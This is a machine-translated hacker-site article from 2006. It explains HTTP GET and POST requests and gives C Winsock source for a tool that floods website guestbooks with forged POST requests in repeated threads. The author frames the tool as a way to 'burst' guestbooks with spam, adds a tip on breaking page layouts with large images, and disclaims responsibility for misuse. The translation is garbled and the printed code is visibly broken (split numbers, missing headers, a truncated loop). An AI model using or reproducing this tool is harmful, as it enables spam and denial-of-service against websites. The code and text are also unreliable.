With a Winsock implementation on the website of the database data injection-vulnerability warning-the black bar safety net

2006-01-31T00:00:00
ID MYHACK58:6220066791
Type myhack58
Reporter 佚名
Modified 2006-01-31T00:00:00

Description

In writing this article before, it is necessary to"inject"one word describes it. The difference to the usualSQL injection, where the injection actually just construct an HTTP request packet to a program instead of a WEB page is submitted, data is automatically submitted. Hey, speaking of which, I see your spooky smile, we just write a loop, what language you say, to a specific WEB page to send HTTP packets, as long as a few minutes, Oh he of the books on the burst, and...... Hey, Hey, Hey...... Even a Cup of tea, the next re-write.

First, or brush up on what the HTTP Protocol. We open a site, say http://www. 1 6 3. com, in fact, IE as a client, it will send to the server the following request packet(even use sniffer intercepted:

|

GET / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd. ms-

powerpoint, application/vnd. ms-excel, application/msword, application/x-shockwave-flash, /

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Host: www.163.com

Connection: Keep-Alive

Cookie: NETEASE_SSN=jsufcz; NETEASE_ADV=1 1&2 2; Province=0; City=0; NTES_UV_COOKIE=YES


We see in the above message, there are many fields, of course, of which there are many is not a must, if our own programming, the only care necessary is on the line. In the HTTP/1.1 Protocol stipulates a minimum the request message by the method field of the GET/POST/HEAD and host fields, HOST. As the above GET / HTTP/1.1 HOST:www.163.com

But in HTTP/1.0, the HOST field is not required, why cannot the province, believe you also know, I don't know the words, also does not matter, the next to see.

In order to send data to server, the browser usually using a GET or POST method to the server to submit the message. The server receives a packet after decoding the analysis of the required data and processing, and finally returns the result. Usually we can see such as http://xxx. xxx. xxx. xxx/show. asp? id=xxx to the URL request, we can construct the following packet to complete

GET /show. asp? id=xxx HTTP/1.1

HOST:xxx. xxx. xxx. xxx

Subject to the URL length 1 0 2 4 The limit, using the GET method can only submit a small amount of data, if we entered an article, then you can only use POST method. In explaining the POST method some of the points before, or let everyone take a section of a POST request packets, so that the POST packets have a roughly understanding. Below is My to a books of comment, even still with sniffer cut down.

POST /gbook/add.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd. ms-

powerpoint, application/vnd. ms-excel, application/msword, application/x-shockwav

e-flash, /

Referer: http://218.76.65.47/gbook/add.php

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Host: 218.76.65.47

Content-Length: 1 1 5

Connection: Keep-Alive

name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say. GIFs&comment=test&passw

ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4


With the GET method compared, in the field below more than a piece of content, this is what we to the guestbook to submit data, if there is Chinese to go through the urlencode encoding. Also let us omit unnecessary fields, construct a minimal POST request

POST /gbook/add.php HTTP/1.1

Host: 218.76.65.47

Content-Type: application/x-www-form-urlencoded

Content-Length: 1 1 5

name=test&email=&comefrom=&homepage=&icq=&oicq=&image=say. GIFs&comment=test&passw

ord=&doadd=%B7%A2%CB%CD%C1%F4%D1%D4


Above the Content-Type field indicates to the POST form type, Content-Length, of course, is representation of the Entity Data of the length, here are not less, otherwise it can not be received correctly. Thus, the server-side processing of the page will receive your submitted data, and receiving processing, the If is guestbook, then it is written to the database. If at a fast speed to a books send such packets, the fact that the books had been you mad irrigation.

Ohh, fancy face even don't know speak what, Chaos 不拉几, that is, the coupling may also want to try to speak clearly point is, no resistance to the entrance of the languages didn't pass on this slightly, but also hope brother and sisters forgive me forgive me. Tell the client sent, then the server receiving a question.

When the packet data arrives at the server, the server the underlying process is received and placed into a particular buffer, and set some environment variables, such as"CONTENT_LENGTH"AND"QUERY_STRING", etc., of course, during this period or masking some of the underlying details, such as data submitted by clients is how to be reset to the requested page to the standard input of the coupling also eludes, Hey Hey to be able to figure out, even will writeOSto go. After the high-level application programs such as CGI, ASP, PHP, etc. to extract data, wherein the CGI must also conduct their own Unencode decoding and string extraction. If the TO THE a ASP books written message, I submit the name of the name and the content body field, and using a POST form submission, in the ASP program should be as follows for reception:

name=request. form("name")

body=request. form("body")

And added to the database

rs. addnew

rs("name")=name

rs("body")=body

rs. update

At this point, the speaking of also basically finished, but there is something also to note, in sending messages, in the entity content must also be added to the Submit button"name=value"URLEncode encoding, otherwise there may not be written to the database, Why ? I am finding the reason! The following is the relevant source code:

/ encode. h /

/ Unencode URL encode function /

/*

It should be noted here, the compiler in the processing of Chinese characters, it will automatically according to the character bit 7 to read into a

Or two characters, then you can force the use of unsigned char *to read into a character.

*/

int isT(char ch)

{

if(ch==' '||ch=='%'||ch=='/'||ch&0x80) return 1;

else return 0;

}

int encode(char s,char d)

{

if(! s||! d) return 0;

for(;*s!= 0;s++)

{

unsigned char p=(unsigned char)s;

if(*p==' ')

{

*d='%';

*(d+1)='2';

*(d+2)='0';

d+=3;

}

else if(isT(*p))

{

char a[3];

*d='%';

sprintf(a,"%02x",*p);

*(d+1)=a[0];

*(d+2)=a[1];

d+=3;

}

else

{

d=p;

d++;

}

}

*d=0;

return 1;

}

/ Unencode the URL decoding function /

int unencode(char s,char d)

{

if(! s||! d) return 0;

for(;*s!= 0;s++)

{

if(*s=='+')

{

*d=' ';

d++;

}

else if(*s=='%')

{

int code;

if(sscanf(s+1,"%02x",&code)!= 1) code='?';

*d=code;

s+=2;

d++;

}

else

{

d=s;

d++;

}

}

*d=0;

return 1;

}

/ booksend.cpp /

/ Packet send procedure /

include

include

include "encode. h"

include

pragma comment(lib,"ws2_32. lib")

int checkpra(int argc,char *argv[]);

void usage();

DWORD WINAPI senddata(LPVOID lp);

char ip[2 0]={0};

USHORT port=0;

char page[1 2 8]={0};

char value[1 0 2 4]={0};

int ttime=1;

int Delay-Time=2 0 0 0;

SOCKET sock;

struct sockaddr_in sin;

char sendbuf[1 0 2 4*4]={0};

void main(int argc,char *argv[])

{

if(checkpra(argc,argv)==-1) return;

WSADATA wsa;

if(WSAStartup(0x0202,&wsa)!= 0)

{

printf("WSAStartup failed with error:%d\n",GetLastError());

return;

}

sin. sin_family=AF_INET;

if(inet_addr(ip)!= INADDR_NONE)

sin. sin_addr. server_address=inet_addr(ip);

else

{

struct hostent *phost=gethostbyname(ip);

if(phost==NULL)

{

printf("Resolve %s error!\ n",ip);

return;

}

memcpy(&sin. sin_addr,phost->h_addr_list[0],phost->h_length);

}

sin. sin_port=htons(port);

char tempbuf[1 0 2 4]={0};

sprintf(tempbuf,"POST %s HTTP/1.1\n",page);

strcpy(sendbuf,tempbuf);

memset(tempbuf,0,sizeof(tempbuf));

sprintf(tempbuf,"HOST: %s\n",ip);

strcat(sendbuf,tempbuf);

strcat(sendbuf,"Accept: image/gif, /\n");

strcat(sendbuf,"Content-Type: application/x-www-form-urlencoded\n");

memset(tempbuf,0,sizeof(tempbuf));

sprintf(tempbuf,"Content-Length: %d\n",strlen(value));

strcat(sendbuf,tempbuf);

strcat(sendbuf,"Connection: Keep-Alive\n\n");

strcat(sendbuf,value);

for(int i=0;i {

CreateThread(NULL,0,senddata,&i,0,NULL);

Sleep(delay-time);

}

WSACleanup();

}

DWORD WINAPI senddata(LPVOID lp)

{

SOCKET sock=socket(AF_INET,SOCK_STREAM,0);

if(sock==INVALID_SOCKET)

{

printf("Socket() failed with error:%d\n",GetLastError());

return -1;

}

int ret;

printf("State:Connecting...\n");

ret=connect(sock,(struct sockaddr*)&sin,sizeof(sin));

if(ret==SOCKET_ERROR)

{

printf("Connect() failed with error:%d\n",GetLastError());

return -1;

}

printf("State:Connected!\ n");

printf("State:Sending...time %d ",(int)lp+1);

ret=send(sock,sendbuf,strlen(sendbuf)+1,0);

if(ret>0)

printf("Send success!\ n");

else

printf("Send error!\ n");

char recvbuf[1 0 2 4*1 0]={0};

ret=recv(sock,recvbuf,sizeof(recvbuf),0);

if(strstr(recvbuf,"1 0 0")||strstr(recvbuf,"2 0 0")||strstr(recvbuf,"3 0 2"))

printf("Oh, the injection successful!\ n\n");

else

printf("injected a bit of a problem Oh, please.!\ n\n");

closesocket(sock);

return 1;

}

void usage()

{

char pathname[1 2 8]={0};

GetModuleFileName(NULL,pathname,sizeof(pathname));

char *p=pathname+strlen(pathname)-1;

for(;*p!='\'; p--);

printf("-----------------------------------------------\n");

printf("Usage:%sip port page value [times] [delay]\n",p+1);

printf("Code by JsuFcz--http://jsufcz. 21xcn. net\n");

printf("Ex:%s 10.0.0.169 8 0 /guestbk/add.php name=abc-body=hehe-doadd=sending message",p+1);

printf("-----------------------------------------------\n");

}

int checkpra(int argc,char *argv[])

{

if(argc<5)

{

printf("incorrect usage: should be at least 4 arguments\n\n");

usage();

return -1;

}

else if(argc>6)

{

printf("wrong usage: only up to 6 parameters\n\n");

usage();

return -1;

}

if(argc==6)

{

ttime=atoi(argv[5]);

}

if(argc==7)

{

ttime=atoi(argv[5]);

delay-time=atoi(argv[6]);

}

strcpy(ip,argv[1]);

port=atoi(argv[2]);

strcpy(page,argv[3]);

for(int i=0;argv[4][i]!= 0;i++)

{

if(argv[4][i]=='-') argv[4][i]='&';

if(argv[4][i]=='\") argv[4][i]=' ';

}

encode(argv[4],value);

return 0;

}


The above code has been in the VC6 compiled through, you can also go to my personal home page on the http://jsufcz.21xcn.net download the source code and the command-line program.

At the end of the article, even there is little experience to share with you. In the guestbook if you have submitted expressions or pictures or the like, since the books of the relative links of the limit, as long as the books directory of image resources, even they can just fetch the patch, so if an image size is very large, the books layout is you broke.

(Affirms: this Chapter is even used for the interest of the technology industry friends to share, if someone used unlawful attempt, even without the tube.)